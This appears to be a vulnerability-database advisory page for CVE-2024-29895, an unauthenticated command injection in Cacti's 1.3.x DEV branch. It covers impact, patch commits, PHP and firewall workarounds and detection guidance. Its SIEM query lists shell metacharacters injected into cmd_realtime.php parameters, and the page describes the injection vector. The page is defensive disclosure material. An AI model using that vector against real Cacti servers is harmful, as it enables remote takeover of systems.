CVE-2024-29895 – CVE-2024-29895 is a critical command injection ... (How to Fix)

Q: What is the severity of CVE-2024-29895?

CVE-2024-29895 has a CVSS score of 10.0 (CRITICAL). CVE-2024-29895 is a critical command injection vulnerability in Cacti's 1.3.x DEV branch that allows unauthenticated attackers to execute arbitrary commands on the server. The vulnerability exists in cmd_realtime.php where user-controlled input from $_SERVER['argv'] is used in command execution when PHP's register_argc_argv option is enabled. This affects all systems running vulnerable Cacti versions with the default PHP configuration.

📋 TL;DR

CVE-2024-29895 is a critical command injection vulnerability in Cacti's 1.3.x DEV branch that allows unauthenticated attackers to execute arbitrary commands on the server. The vulnerability exists in cmd_realtime.php where user-controlled input from $_SERVER['argv'] is used in command execution when PHP's register_argc_argv option is enabled. This affects all systems running vulnerable Cacti versions with the default PHP configuration.

💻 Affected Systems

Products:

Cacti

Versions: 1.3.x DEV branch (specifically commit range before 53e8014d1f082034e0646edc6286cde3800c683d)

Operating Systems: All operating systems running PHP with Cacti

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerable when PHP's register_argc_argv option is On, which is default in many environments including main PHP Docker images.

⚠️ Manual Verification Required

This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.

Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).

🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.

Recommended Actions:

Review the CVE details at NVD
Check vendor security advisories for your specific version
Test if the vulnerability is exploitable in your environment
Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise leading to data theft, ransomware deployment, lateral movement across the network, and persistent backdoor installation.

🟠

Likely Case

Remote code execution leading to web shell installation, credential harvesting, and initial foothold for further attacks.

🟢

If Mitigated

Limited impact if proper network segmentation and least privilege principles are implemented, though still significant risk.

🌐 Internet-Facing: HIGH - Unauthenticated remote exploitation with maximum CVSS score of 10.0 makes internet-facing systems extremely vulnerable.

🏢 Internal Only: HIGH - Even internal systems are vulnerable to any network-accessible attacker, including compromised internal hosts.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Simple command injection via URL parameters when register_argc_argv is enabled. Public advisory and code references available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Commit 53e8014d1f082034e0646edc6286cde3800c683d (note: this commit was reverted in 99633903cad0de5ace636249de16f77e57a3c8fc, so check current branch status)

Vendor Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m

Restart Required: No

Instructions:

1. Update to latest Cacti version that includes the fix. 2. If using DEV branch, ensure you have commit 53e8014d1f082034e0646edc6286cde3800c683d applied. 3. Verify the patch is not reverted in your current version.

🔧 Temporary Workarounds

Disable register_argc_argv

all

Set PHP's register_argc_argv option to Off to prevent URL parameter injection

php.ini: register_argc_argv = Off
Docker: Add '-d register_argc_argv=0' to PHP command

Network Access Control

linux

Restrict access to Cacti web interface to trusted networks only

iptables -A INPUT -p tcp --dport 80 -s TRUSTED_NETWORK -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_NETWORK -j ACCEPT

🧯 If You Can't Patch

Immediately disable or block access to Cacti web interface
Implement strict network segmentation and firewall rules to isolate Cacti servers

🔍 How to Verify

Check if Vulnerable:

Check if running Cacti 1.3.x DEV branch and PHP register_argc_argv is On. Review cmd_realtime.php line 119 for vulnerable code pattern.

Check Version:

php -r "include 'include/global.php'; echo CACTI_VERSION;" or check Cacti web interface About page

Verify Fix Applied:

Verify commit 53e8014d1f082034e0646edc6286cde3800c683d is present and not reverted. Test that $_SERVER['argv'] input is properly sanitized.

📡 Detection & Monitoring

Log Indicators:

Unusual command execution in system logs
Web server logs showing malicious parameters to cmd_realtime.php
Unexpected process execution from web server user

Network Indicators:

Unusual outbound connections from Cacti server
Traffic to known malicious IPs or domains

SIEM Query:

source="web_server_logs" AND uri="*cmd_realtime.php*" AND (param="*;*" OR param="*|*" OR param="*`*" OR param="*$(*")

📊 Metadata

CVE ID: CVE-2024-29895

CVSS v3 Score: 10.0 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE: CWE-77

Published: May 14, 2024

Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-29895, you might also want to check these: